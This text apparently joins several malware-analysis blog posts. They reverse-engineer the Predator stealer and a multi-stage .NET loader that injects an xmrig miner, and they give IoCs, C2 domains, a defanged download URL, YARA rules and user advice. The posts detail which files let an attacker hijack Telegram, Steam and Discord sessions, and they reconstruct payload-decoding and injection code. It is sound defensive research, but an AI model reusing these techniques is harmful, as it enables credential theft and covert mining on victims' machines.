• Profiles dumped

Recommendations

This is, as usual, the same thing that I said about my precedent blog post.

• Always running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools)  to trigger as much as possible all kind of possible Anti-VM detection and closing malware.
• When you have done with your activities stop the VM and restore it with a Specific clean snapshot.
• Avoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.
• Don’t be stupid to click on cracks on youtube, hack software for popular games, or “wonderful” easy cash money (like Free Bitcoin Program /facepalm).
• Flush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.
• Don’t use the same password for all your websites (use 2FA and it’s possible).

Conclusion

This analysis was a kind of a mystery game. It’s hard to understand if Vidar is an evolution of Arkei or a forked malware based on his code. As far it seems this is currently an active one and growing up. A lot of updates are pushed on it regularly probably due because this is a young (forked/copycat) malware. With the fact, that this stealer was also using the skin theme of Android Lokibot (due to the cracked version), this could really lose some minds for identifying what is the correct name of the C2, without any samples to analyze. For now, let’s see with the time if we will more answers to put the puzzle together for this stealer. ¯\_(ツ)_/¯

On my side, if I could sum up this year. I have done way more things than I could imagine because 2018 was a really “reaaalllyyyy” thought year, with a lot of problems and huge issues. Let’s see how this next year will be. But now, it’s time to rest and eat because there were so many sleep hours destroy and skip meals this year for learning stuff.

Special thanks to my buddies (they will know who they are), you are the best <3

#HappyHunting
#SeeYouIn2019

Well, it’s been a long time without some fresh new contents on my blog. I had some unexpected problems that kept me away from here and a lot of work (like my tracker) that explain this. But it’s time to come back (slowly) with some stuff.

So today, this is an In-Depth analysis of one stealer: “Predator the thief”, written in C/C++. Like dozen others malware, it’s a ready to sell malware delivered as a builder & C2 panel package.

The goal is to explain step by step how this malware is working with a lot of extra explanations for some parts. This post is mainly addressed for junior reverse engineers or malware analysts who want for future purposes to understand and defeat some techniques/tricks easily.

So here we go!

Classical life cycle

The execution order is almost the same, for most of the stealers nowadays. Changes are mostly varying between evading techniques and how they interact with the C2.  For example, with Predator, the set up is quite simple but could vary if the attacker set up a loader on his C2.

Preparing the field

Before stealing sensitive data, Predator starts by setting up some basics stuff to be able to work correctly. Almost all the configuration is loaded into memory step by step.

So let’s put a breakpoint at “0x00472866” and inspect the code…

1. EBX is set to be the length of our loop (in our case here, it will be 0x0F)
2. ESI have all functions addresses stored
3. EAX, will grab one address from ESI and moves it into EBP-8
4. EBP is called, so at this point, a config function will unpack some data and saved it into the stack)
5. ESI position is now advanced by 4
6. EDI is incremented until reaching the same value as stored EBX
7. When the EDI == EBX, it means that all required configuration values are stored into the stack. The main part of the malware could start

So, for example, let’s see what we have  inside 0040101D at 0x00488278

So with x32dbg, let’s see what we have… with a simple command

Command: go 0x0040101D

As you can see, this is where the C2 is stored, uncovered and saved into the stack.

So what values are stored with this technique?

• C2 Domain
• %APPDATA% Folder
• Predator Folder
• temporary name of the archive predator file and position
• also, the name of the archive when it will send to the C2
• etc…

With the help of the %APPDATA%/Roaming path, the Predator folder is created (\ptst). Something notable with this is that it’s hardcoded behind a Xor string and not generated randomly. By pure speculation, It could be a shortcut for “Predator The STealer”.

This is also the same constatation for the name of the temporary archive file during the stealing process: “zpar.zip”.

The welcome message…

When you are positioned at the main module of the stealer, a lovely text looped over 0x06400000 times is addressed for people who want to reverse it.

Obfuscation Techniques

The thief who loves XOR (a little bit too much…)

Almost all the strings from this stealer sample are XORed, even if this obfuscation technique is really easy to understand and one of the easier to decrypt. Here, its used at multiple forms just to slow down the analysis.

GetProcAddress Alternatives

For avoiding to call directly modules from different libraries, it uses some classic stuff to search step by step a specific API request and stores it into a register. It permits to hide the direct call of the module into a simple register call.

So firstly,  a XORed string (a DLL) is decrypted.  So for this case, the kernel32.dll is required for the specific module that the malware wants to call.

When the decryption is done, this library is loaded with the help of “LoadLibraryA“. Then, a clear text is pushed into EDX: “CreateDirectoryA“… This will be the module that the stealer wants to use.

The only thing that it needs now, its to retrieve the address of an exported function “CreateDirectoryA” from kernel32.dll. Usually, this is done with the help of GetProcAddress but this function is in fact not called and another trick is used to get the right value.

So this string and the IMAGE_DOS_HEADER of kernel32.dll are sent into “func_GetProcesAddress_0”. The idea is to get manually the pointer of the function address that we want with the help of the Export Table. So let’s see what we have in the in it…

struct IMAGE_EXPORT_DIRECTORY {
	long Characteristics;
	long TimeDateStamp;
	short MajorVersion;
	short MinorVersion;
	long Name;
	long Base;
	long NumberOfFunctions;
	long NumberOfNames;
	long *AddressOfFunctions;    <= This good boy
	long *AddressOfNames;        <= This good boy 
	long *AddressOfNameOrdinals; <= This good boy
}

After inspecting the structure de IMAGE_EXPORT_DIRECTORY, three fields are mandatory :

• AddressOfFunctions – An Array who contains the relative value address (RVA) of the functions of the module.
• AddressOfNames – An array who stores with the ascending order of all functions from this module.
• AddressOfNamesOrdinals – An 16 bits array who contains all the associated ordinals of functions names based on the AddressOfNames.

source

So after saving the absolute position of these 3 arrays, the loop is simple

1. Grab the RVA of one function
2. Get the name of this function
3. Compare the string with the desired one.

So let’s see in details to understand everything :

If we dig into ds:[eax+edx*4], this where is stored all relative value address of the kernel32.dll export table functions.

With the next instruction add eax,ecx. This remains to go at the exact position of the string value in the “AddressOfNames” array.

DLLBaseAddress + AddressOfNameRVA[i] = Function Name 
   751F0000    +       0C41D4        = CreateDirectoryA

The comparison is matching,  now it needs to store the “procAddress.  So First the Ordinal Number of the function is saved. Then with the help of this value, the Function Address position is grabbed and saved into ESI.

ADD           ESI, ECX
ProcAddress = Function Address + DLLBaseAddress

In disassembly, it looks like this :

Let’s inspect the code at the specific procAddress…

So everything is done, the address of the function is now stored into EAX and it only needs now to be called.

Anti-VM Technique

Here is used a simple Anti-VM Technique to check if this stealer is launched on a virtual machine. This is also the only Anti-Detection trick used on Predator.

First, User32.dll (Xored) is dynamically loaded with the help of “LoadLibraryA“, Then “EnumDisplayDevicesA” module is requested with the help of User32.dll. The idea here is to get the value of the “Device Description” of the current display used.

When it’s done, the result is checked with some values (obviously xored too) :

• Hyper-V
• VMware
• VirtualBox

If the string matches, you are redirected to a function renamed here “func_VmDetectedGoodBye.

How to By-Pass this Anti-VM technique?

For avoiding this simple trick, the goal is to modify the REG_SZ value of “DriverDesc” into {4d36e968-e325-11ce-bfc1-08002be10318} to something else.

And voilà!

Stealing Part

Let’s talk about the main subject… How this stealer is organized… As far I disassemble the code, this is all the folders that the malware is setting on the “ptst” repository before sending it as an archive on the C2.

• Folder
  • Files: Contains all classical text/documents files at specifics paths
  • FileZilla: Grab one or two files from this FTP
  • WinFTP: Grab one file from this FTP
  • Cookies: Saved stolen cookies from different browsers
  • General: Generic Data
  • Steam: Steal login account data
  • Discord: Steal login account data
• Files
  • Information.log
  • Screenshot.jpeg <= Screenshot of the current screen

Telegram

For checking if Telegram is installed on the machine, the malware is checking if the KeyPath “Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1” exists on the machine.

So let’s inspect what we have inside this “KeyPath”? After digging into the code, the stealer will request the value of “InstallLocation” because of this where Telegram is installed currently on the machine.

Step by step, the path is recreated (also always, all strings are xored) :

• %TELEGRAM_PATH%
• \Telegram Desktop
• \tdata
• \D877F783D5D3EF8C

The folder “D877F783D5D3EF8C” is where all Telegram cache is stored. This is the sensitive data that the stealer wants to grab. Also during the process, the file map* (i.e: map1) is also checked and this file is, in fact, the encryption key. So if someone grabs everything for this folder, this leads the attacker to have an access (login without prompt) into the victim account.

Steam

The technique used by the stealer to get information for one software will remain the same for the next events (for most of the cases). This greatly facilitates the understanding of this malware.

So first, it’s checking the “SteamPath” key value at “HKCU\Software\Valve\Steam” to grab the correct Steam repository. This value is after concatenating with a bunch of files that are necessary to compromise a Steam Account.

So it will check first if ssfn files are present on the machine with the help of “func_FindFiles”, if it matches, they are duplicated into the temporary malware folder stored on %APPDATA%/XXXX. Then do the same things with config.vdf

So what the point with these files? First, after some research, a post on Reddit was quite interesting. it explained that ssfn files permit to by-pass SteamGuard during the user log-on.

Now what the point of the second file? this is where you could know some information about the user account and all the applications that are installed on the machine. Also, if the ConnectCache field is found on this one, it is possible to log into the stolen account without steam authentication prompt. if you are curious, this pattern is represented just like this :

"ConnectCache"
{
       "STEAM_USERNAME_IN_CRC32_FORMAT" "SOME_HEX_STUFF"
}

The last file, that the stealer wants to grab is “loginusers.vdf”. This one could be used for multiple purposes but mainly for setting the account in offline mode manually.

For more details on the subject there a nice report made by Kapersky for this:

• Steam Stealers

Wallets

The stealer is supporting multiple digital wallets such as :

• Ethereum
• Multibit
• Electrum
• Armory
• Bytecoin
• Bitcoin
• Etc…

The functionality is rudimentary but it’s enough to grab specific files such as :

• *.wallet
• *.dat

And as usual, all the strings are XORed.

FTP software

The stealer supports two FTP software :

• Filezilla
• WInFTP

It’s really rudimentary because he only search for three files, and they are available a simple copy to the predator is done :

• %APPDATA%\Filezilla\sitemanager.xml
• %APPDATA%\Filezilla\recentservers.xml
• %PROGRAMFILES%\WinFtp Client\Favorites.dat

Browsers

It’s not necessary to have some deeper explanation about what kind of file the stealer will focus on browsers. There is currently a dozen articles that explain how this kind of malware manages to steal web data. I recommend you to read this article made by @coldshell about an example of overview and well detailed.

As usual, popular Chrome-based & Firefox-based browsers and also Opera are mainly targeted by Predator.

This is the current official list supported by this stealer :

• Amigo
• BlackHawk
• Chromium
• Comodo Dragon
• Cyberfox
• Epic Privacy Browser
• Google Chrome
• IceCat
• K-Meleon
• Kometa
• Maxthon5
• Mozilla Firefox
• Nichrome
• Opera
• Orbitum
• Pale Moon
• Sputnik
• Torch
• Vivaldi
• Waterfox
• Etc…

This one is also using SQLite for extracting data from browsers and using and saved them into a temporary file name “vlmi{lulz}yg.col”.

So the task is simple :

• Stole SQL Browser file
• Extract data with the help of SQLite and put into a temporary file
• Then read and save it into a text file with a specific name (for each browser).

When forms data or credentials are found they’re saved into two files on the General repository :

• forms.log
• password.log
• cards.log

Discord

If discord is detected on the machine, the stealer will search and copy the “https_discordapp_*localstorage” file into the “ptst” folder. This file contains all sensitive information about the account and could permit some authentication without a prompt login if this one is pushed into the correct directory of the attacker machine.

Predator is inspecting multiple places…

This stealer is stealing data from 3 strategical folders :

• Desktop
• Downloads
• Documents

Each time, the task will be the same, it will search 4 type of files with the help of GetFileAttributesA :

• *.doc
• *.docx
• *.txt
• *.log

When it matches, they have copied into a folder named “Files”.

Information.log

When tasks are done, the malware starts generating a summarize file, who contains some specific and sensitive data from the machine victim beside the file “Information.log”. For DFIR, this file is the artifact to identify the name of the malware because it contains the name and the specific version.

So first, it writes the Username of the user that has executed the payload, the computer name, and the OS Version.

User name: lolilol
Machine name: Computer 
OS version: Windoge 10

Then copy the content of the clipboard with the help of GetClipBoardData

Current clipboard: 
-------------- 
Omelette du fromage

Let’s continue the process…

Startup folder: C:\Users\lolilol\AppData\Local\Temp\predator.exe

Some classic specification about the machine is requested and saved into the file.

CPU info: Some bad CPU | Amount of kernels: 128 (Current CPU usage: 46.112917%) 
GPU info: Fumik0_ graphical display 
Amount of RAM: 12 GB (Current RAM usage: 240 MB) 
Screen resolution: 1900x1005

Then, all the user accounts are indicated

Computer users: 
lolilol 
Administrator 
All Users 
Default 
Default User 
Public

The last part is about some exotics information that is quite awkward in fact… Firstly, for some reasons that I don’t want to understand, there is the compile time hardcoded on the payload.

Then the second exotic data saved into Information.log is the grabbing execution time for stealing contents from the machine… This information could be useful for debugging some tweaks with the features.

Additional information:
Compile time: Aug 31 2018
Grabbing time: 0.359375 second(s)

C2 Communications

For finishing the information.log, a GET request is made for getting some network data about the victim…

First, it set up the request by uncovered some Data like :

• A user-agent
• The content-type

• The API URL ( /api/info.get )

We can have for example this result :

Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;

When the request is done, the data is consolidated step by step with the help of different loops and conditions.

When the task is done, there are saved into Information.log

City: Nopeland 
Country:  NopeCountry
Coordinates: XX.XXXX N, X.XXXX W 
IP: XXX.XXX.XXX.XXX 
Timezone: Nowhere 
Zip code: XXXXX

The Archive is not complete, it only needs for the stealer to send it to the C2.

So now it set up some pieces of information into the gate.get request with specifics arguments, from p1 to p7, for example :

• p1: Number of accounts stolen
• p2: Number of cookies stolen
• p4: Number of forms stolen
• etc…

results :

The POST request is now complete, the stealer will clean everything and quit.

Update – v2.3.7

So during the analysis,  new versions were pushed… Currently (at the time where this post was redacted), the v3 has been released, but without possession of this specific version, I won’t talk anything about it and will me be focus only on the 2.3.7.

It’s useless to review from scratch, the mechanic of this stealer is still the same, just some tweak or other arrangements was done for multiple purposes… Without digging too much into it, let’s see some changes (not all) that I found interesting.

As usual, this is the same patterns :

• Code optimizations (Faster / Lightweight)
• More features…

As you can see v2.3.7 on the right is much longer than v2.3.5 (left), but the backbone is still the same.

Mutex

On 2.3.7,  A mutex is integrated with a specific string called “SyystemServs”

Xor / Obfuscated Strings

During the C2 requests, URL arguments are generated byte per byte and unXOR.

For example :

push 04
...
push 61
...
push 70
...

leads to this 
HEX    : 046170692F676174652E6765743F70313D
STRING : .api/gate.get?p1=

This is basic and simple but enough to just slow down the review of the strings. but at least, it’s really easy to uncover it, so it doesn’t matter.

This tweak by far is why the code is much longer than v2.3.5.

Loader

Not seen before (as far I saw), it seems on 2.3.7, it integrates a loader feature to push another payload on the victim machine, easily recognizable with the adequate GET Request

/api/download.get

The API request permits to the malware to get an URL into text format. Then Download and saved it into disk and execute it with the help of ShellExecuteA

There also some other tweaks, but it’s unnecessary to detail on this review, I let you this task by yourself if you are curious

IoC

v2.3.5

• 299f83d5a35f17aa97d40db667a52dcc | Sample Packed
• 3cb386716d7b90b4dca1610afbd5b146 | Sample Unpacked
• kent-adam.myjino.ru | C2 Domain

v2.3.7

•  cbcc48fe0fa0fd30cb4c088fae582118 | Sample Unpacked
•  denbaliberdin.myjino.ru | C2 Domain

HTTP Patterns

• GET    –   /api/info.get
• POST  –  /api//gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X
• GET    –  /api/download.get

MITRE ATT&CK

v2.3.5

• Discovery – Peripheral Device Discovery
• Discovery – System Information Discovery
• Discovery – System Time Discovery
• Discovery – Query Registry
• Credential Access – Credentials in Files
• Exfiltration – Data Compressed

v2.3.7

• Discovery – Peripheral Device Discovery
• Discovery – System Information Discovery
• Discovery – System Time Discovery
• Discovery – Query Registry
• Credential Access – Credentials in Files
• Exfiltration – Data Compressed
• Execution –  Execution through API

Author / Threat Actor

• Alexuiop1337

Yara Rule

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief v2.3.5 & +"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2018/12/19"

    strings:
        $mz = { 4D 5A }

        // V2
        $hex1 = { BF 00 00 40 06 } 
        $hex2 = { C6 04 31 6B }
        $hex3 = { C6 04 31 63 }
        $hex4 = { C6 04 31 75 }
        $hex5 = { C6 04 31 66 }
 
        $s1 = "sqlite_" ascii wide
 
        // V3
        $x1 = { C6 84 24 ?? ?? 00 00 8C } 
        $x2 = { C6 84 24 ?? ?? 00 00 1A }  
        $x3 = { C6 84 24 ?? ?? 00 00 D4 } 
        $x4 = { C6 84 24 ?? ?? 00 00 03 }  
        $x5 = { C6 84 24 ?? ?? 00 00 B4 } 
        $x6 = { C6 84 24 ?? ?? 00 00 80 }
 
    condition:
        $mz at 0 and 
        ( ( all of ($hex*) and all of ($s*) ) or (all of ($x*)))
}

 

Recommendations

• Always running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools)  to trigger as much as possible all kind of possible Anti-VM detection and closing malware. When you have done with your activities stop the VM and restore it a Specific clean snapshot when it’s done.
• Avoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.
• Avoiding Cracks and other stupid fake hacks, stealers are usually behind the current game trendings (especially in those times with Fortnite…).
• Use containers for software that you are using, this will reduce the risk of stealing data.
• Flush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.
• Don’t use the same password for all your websites (use 2FA and it’s possible), we are in 2018, and this still sadly everywhere like this.
• Make some noise with your data, that will permit to lose some attacker minds to find some accurate values into the junk information.
• Use a Vault Password software.
• Troll/Not Troll: Learn Russian and put your keyboard in Cyrillic

Conclusion

Stealers are not sophisticated malware, but they are enough effective to make some irreversible damage for victims. Email accounts and other credentials are more and more impactful and this will be worse with the years. Behaviors must changes for the account management to limit this kind of scenario. Awareness and good practices are the keys and this will not be a simple security software solution that will solve everything.

Well for me I’ve enough work, it’s time to sleep a little…

#HappyHunting

Update 2018-10-23 : Yara Rules now working also for v3

A few weeks ago I came across a malware that gave me some interests to dig more into it. It has a curious way to deploy itself, set up a miner on the machine and hide it behind some legit processes.

In an example, when we look at Process Hacker :

• Visual Basic Compiler is launched without reasons
• An awkward child process “Notepad.exe” is consuming a lot of CPU

At first glance, my first thought was “What the heck is going on there ?”

First stage

All begin with a sample available at this address :

hxxp://netload.trade/ghghdshch130.exe

This is a .NET application and starts at this EntryPoint :

static void StatusBarPanelCollection(string[] args) {
	ToolStripItemEventArgs.ExprVisitorBase().EntryPoint.Invoke(null, null);
}

The first thing called behind is an Assembly method named ExprVisitorBase().

public static Assembly ExprVisitorBase() {
  CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider();
  CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(new CompilerParameters
    {
      IncludeDebugInformation = true,
      GenerateExecutable = false,
      GenerateInMemory = true,
      IncludeDebugInformation = true,
      ReferencedAssemblies = 
        {
          string.Format(.POasdIsd("U3lzdGVtLkRyYXdpbmcuZGxs"), new object[0])
        },
        CompilerOptions = string.Format(.POasdIsd("L29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1ZysgL3RhcmdldDp3aW5leGU="), new object[0])
    }, new string[]
    {
      ToolStripItemEventArgs.SizeSoapParameterAttribute.Replace(string.Format(.POasdIsd("I3Jlc25hbWUj"), new object[0]), 
      .POasdIsd("ekp5blhVaktUbFpw")).Replace(string.Format(.POasdIsd("I3Bhc3Mj"), new object[0]), .POasdIsd("VVVlb0NvaXBHdVZj"))
    });
  return compilerResults.CompiledAssembly;
}

This program is going to programmatically compile some code. Indeed, it is possible in .NET to access to the C# compiler with the help of the CSharpCodeProvider class. The call to CompileAssemblyFromSource is where the assembly gets compiled. This method takes the parameters object (CompilerParameters) and the source code, which is a string.

First, if we look deeper into the CompilerParameters object, the configuration let us understand that the new program will be a DLL file and there will be no trace on disk. It will require a specific reference to being able to work, but the string is obfuscated and required “POasdIsd” to be decoded.

internal class 
{
 	public static string POasdIsd(string string_0)
	{
		byte[] bytes = Convert.FromBase64String(string_0);
		return Encoding.UTF8.GetString(bytes);
	}
}

It’s easy to understand “POasdIsd” is just a Base64decode function, and our encoded string is, in fact, the word “System.Drawing.dll”. So this means, this reference is required to compile the source code.

If we continue the analysis, it sets some compiler argument. decoded, this will be compiled in debug mode for an x86 platform :

/optimize+ /platform:X86 /debug+ /target:winexe

So now, the only thing needed is the source code and it’s stored in the variable SizeSoapParameterAttribute, which is of course also obfuscated by a Base64 encoding and additionally encrypted with a XOR key (5).

public static string SizeSoapParameterAttribute = 
    ToolStripItemEventArgs.ASSEMBLY_FLAGS(
        .POasdIsd("cHZsa2IlVnx2c ... D4ID3gPeCUID3g="), 5
);

If we place some breakpoint on the debugger we can see step by step, the generated c# source code

When everything is done, the compilation could be done. We can see that with Process Monitor.

Second stage

At this state, the DLL is compiled and loaded on memory. No need to extract and decompiled it because we have the code! So if we look deeper into it, this file contains a lot of spaghetti code, but the main class is easy to find.

When we rename some function, it’s clearer to understand the goal of this library.

private static string xorKey = "UUeoCoipGuVc";
private static byte[] Payload;

...

private static void Main()
{
  try
  {
    IntPtr hResInfo = Program.FindResource(new IntPtr(0), new IntPtr(138), new IntPtr(23));
    uint size = Program.SizeofResource(new IntPtr(0), hResInfo);
    IntPtr hResData = Program.LoadResource(new IntPtr(0), hResInfo);
    IntPtr source = Program.LockResource(hResData);
    Program.Payload = new byte[size];
    Marshal.Copy(source, Program.Payload, 0, Convert.ToInt32(num));
    Program.Payload = Program.XOR(Program.ConvertFromBmp(Program.Byte2Image(Program.Payload)));
    Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader));
    thread.Start();
  }
  catch
  {
  }
}

So when it’s loaded into memory. It will request an HTML resource (IntPtr(23) is RT_HTML) of the main program, so if you debug this DLL on DNspy, it will crash because it will target a resource that does not exist on it. So let’s go back a bit on “ghghdshch130.exe” and inspect .rsrc. We have a curious file with named 138 (which is the Resource ID)

So if we inspect it, this is a PNG file, with a 461 x 461 dimension, 8-bit/color RGBA, non-interlaced.

So now lets the magic happen… With the code seen as above, this image is converted into a byte array and then again into an image (Bitmap format). The main reason here,  its to be able to use ConvertFromBmp, the most important function of the DLL file. The goal is to reorganized properly into memory, the different sections of the payload with the help of BlockCopy. So it will copy pixel per pixel on the correct destination offset with a 4 bytes buffer each time.

I clean the code to understand clearly the steps.

private static byte[] ConvertFromBmp(Bitmap imageFile) { 
 int width = imageFile.Width; 
 int correctSize = width * width * 4; 
 byte[] correctOffset = new byte[correctSize]; 
 int size = 0; 
 for (int x = 0; x < width; x++) { 
   for (int y = 0; y < width; y++) { 
     Buffer.BlockCopy(BitConverter.GetBytes(imageFile.GetPixel(x, y).ToArgb()), 0, correctOffset, size, 4); 
     size += 4; 
   } 
 }

 int finalSize = BitConverter.ToInt32(array, 0); 
 byte[] XorPayload = new byte[finalSize]; 
 Buffer.BlockCopy(correctOffset, 4, XorPayload, 0, XorPayload.Length); 
 
 return XorPayload; 
}

So now, our payload is almost done, it has just be decrypted with a specific xor key, in this case, its the value “UUeoCoipGuVc”

internal class Program
{
private static byte[] XOR(byte[] bytes)
{
  byte[] bytes2 = Encoding.Unicode.GetBytes(Program.XorString);
  for (int i = 0; i < bytes.Length; i++)
  {
  int num = i;
  bytes[num] ^= bytes2[i % 16];
  }
  return bytes;
}

When the payload is “finally” created, the assembly object is loaded into a thread.

Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader)); 
thread.Start();

Third Stage

So if you believe that everything is done. Well, unfortunately, you are very wrong ! This is packed/obfuscated… again!

Without entering into some madness to understand the code, I note that there are three files right now in the resource folder.

Two of them are XOR encrypted payloads and one is a text file with Base64 encoded strings. When we look into the “shitty” code to understand what is the purpose of the text file, this is in fact, a Manifest Resource Stream, a content that is embedded in the assembly at compile time. With some lines of python code, let’s see what we have when everything is decoded :

 => python3 manifest.py 
...
'RSRCNAME'
'RSRCPWD'
'Dotwall Evaluation'

The last entry is pretty interesting because it shows us that this stage is in fact packed with Dotwall, a .NET obfuscator that is not available on the public on this day (or it looks like).

So what is the goal of this stage?

First, it copies the first stage on the main user directory and keeps the new path into memory for future purposes. Then delete the alternate stream name Zone.Identifier of this file, so it permits here, to erase its traces to confirm this malware was downloaded from the outside network.

Then it sets a persistence trick with an Internet Shortcut file created on Windows startup menu named “rTErod.url”‘, which could probably explain why the Zone.Identifier task was done above.

[InternetShortcut]
URL=file:///C:/Users/user/bsdsjdpjcqdpcdq.exe

Then, it searches if the visual basic compiler is present on the machine, and inject the resource “rWyMgsOzOKRu” into it. To simplify the way how the program decrypts this file, with all the interaction of different classes and the manifest that leads us to hundreds line of code, I could summarize this with just 10 lines of C# source code.

byte[] buffer = File.ReadAllBytes("xplACLWqdLvY"); // Xor Key 
byte[] bytes = Encoding.Unicode.GetBytes("rWyMgsOzOKRu"); // Encrypted Payload

for (int i = 0; i < buffer.Length; i++) {
    buffer[i] ^= bytes[i % 16];
}

using (var decrypted = new FileStream("decrypted_resource.exe", FileMode.Create, FileAccess.Write)) {
 decrypted.Write(bytes, 0, byteArray.Length);
}       

this Assembly is named “adderalldll” and remains to Adderall Protector.

After some cleaning, this tool is called by using some reflection.  The run() method of the new Object class (Adderall) is invoked with some additional arguments in entries:

• @”C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe”
• “”
• DecryptPayload(cryptedResource) // <= Our Final Unpacked Malware
• true

Type Adderall_resource = exportedTypes[pos];
object Adderall = Activator.CreateInstance(Adderall_resource);
vbcPath = @"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe";

Adderall_resource.InvokeMember("run", BindingFlags.InvokeMethod, null, Adderall, new object[] {
 vbcPath, 
 "",      
 DecryptPayload(cryptedResource), 
 true 
});

Fourth Stage

So what we have into the adderall.dll? Well… This is obfuscated with Dotwall and It looks like there are no embedded payload resources, just the manifest stream file. It means that we are very close to our final miner malware!

So let’s see what we have again on the decoded Manifest :

=> python3 manifest.py 
...
'kernel32'
'CreateProcessA'
'kernel32'
'GetThreadContext'
'kernel32'
'Wow64GetThreadContext'
'kernel32'
'SetThreadContext'
'kernel32'
'Wow64SetThreadContext'
'kernel32'
'ReadProcessMemory'
'kernel32'
'WriteProcessMemory'
'ntdll'
'NtUnmapViewOfSection'
'kernel32'
'VirtualAllocEx'
'kernel32'
'ResumeThread'
...
'Dotwall Evaluation'

Typically, we understand that the goal here its execute some process injection and the process vbc.exe will host the malware.

Fifth Stage

So now, that our miner is finally deployed, let’s do some analysis on it. The first thing that we see here is that this one is developed in C/C++.

The malware is checking if it’s running on 32 or 64 bits with the help of IsWow64Process and will decide where it will do some process injection:

• If it’s 32 bits, the miner will be behind wuapp.exe
• If it’s 64 bits, the miner will be behind notepad.exe

As below, this is an example of a process injection of notepad.exe behind Winrar.exe, a child process of explorer.exe

It looks like that we have here an xmrig miner at reading the command line if we check directly on the help display, its identical.

  -a, --algo=ALGO          cryptonight (default) or cryptonight-lite
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
  -t, --threads=N          number of miner threads
...
  -c, --config=FILE        load a JSON-format configuration file
...

To confirm if it’s this specific miner, let’s dump memory on base address 0x400000 :

Our PE header is erased and compressed with UPX

…and with a quick search, our xmrig miner is right here

Miner config Setup

The malware is generating a specific xmrig config file for the victim machine. First, it pushed the miner pool and the user account.

Then, the typical xmrig config file is generated and saved into two files “cfg” and cfgi”.

In this example, the output config file is this :

{{ "algo": "cryptonight", "background": false, "colors": true, "retries": 5, "retry-pause": 5, "syslog": false, "print-time": 60, "av": 0, "safe": false, "cpu-priority": null, "cpu-affinity": null, "threads": 1, "pools": [ { "url": "xmr.pool.minergate.com:45560", "user": "[email protected]", "pass": "x", "keepalive": false, "nicehash": false } ], "api": { "port": 0, "access-token": null, "worker-id": null }}

Persistence

Another persistence is also added at this step, a registry key is created and this entry is periodically checked.

The executable file linked with the registry is in the same folder with the miner configurations and this is a legit vbc.exe process

Hiding Method

This malware checks if the task manager is launched.

if it matches, it will shutdown notepad.exe process, if the miner is currently executed. Then, the miner will not restart it again as long as taskmgr is still opened.

Summary

1. We have an executable who compiled and injected itself a DLL
2. This DLL deploys another executable which was behind a fake PNG file and was also injected into the first payload
3. In this program, a DLL named Adderall is Invoked, this permits to deploy the unpacked malware into visual basic compiler with the help of RunPE
4. Our final malware will set up a miner config and injects xmrig into a notepad.exe or wuapp.exe (according to a 32 or 64 bits Operating System).

Yara rules

Xmrig Miner Malware

rule XmrigMinerMalware {
    meta:
        description = "Xmrig Miner Malware"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $s1 = "\\cfg" wide ascii
        $s2 = "\\cfgi" wide ascii
        $s3 = "\\notepad.exe" wide ascii
        $s4 = "\\wuapp.exe" wide ascii
        $s5 = "--show-window" wide ascii
        $s6 = "taskmgr.exe" wide ascii
        $s7 = "Miner" wide ascii
    condition:
        $mz at 0 and all of ($s*) 
}

Adderall Protector

rule Adderall {
    meta:
        description = "Adderall Protector"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "adderalldll" wide ascii
    condition:
        $mz at 0 and (all of ($n*) and $s1)
}

Dotwall Obfuscator

rule DotWall {
    meta:
        description = "Dotwall Obfuscator"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "RG90d2Fsb" wide ascii
    condition:
        $mz at 0 and (
            all of ($n*) and $s1
        )
}

IoC

[email protected] _

517AC5506A5488A1193686F66CB57AD3288C2258C510004EDB2F361B674526CC
AA28AA381B935EB98A6B3DEC4C86E1570EF142B041DB4255445C52A81F57A02F
40F5D5BBC054BA193B3D46BA1AE113AC9C9FCAFDDEC52CF02F82C4A22BF9F15F
0C5FC323873FBE693C1FF860282F035AD447050F8EC37FF2E662D087A949DFC9
7C23DA75BA54998363C4E278488F05588FB4E7D8201CCDAA870DD93F0328B911
BECDCC441E29D518D2258F0718000EBD0848ADB4CEFA00223F386A91FDB11677

Conclusion

This miner was pretty cool to reverse for using differents techniques. Good time (and some headaches) to explain and understand the different tasks.

Happy Hunting!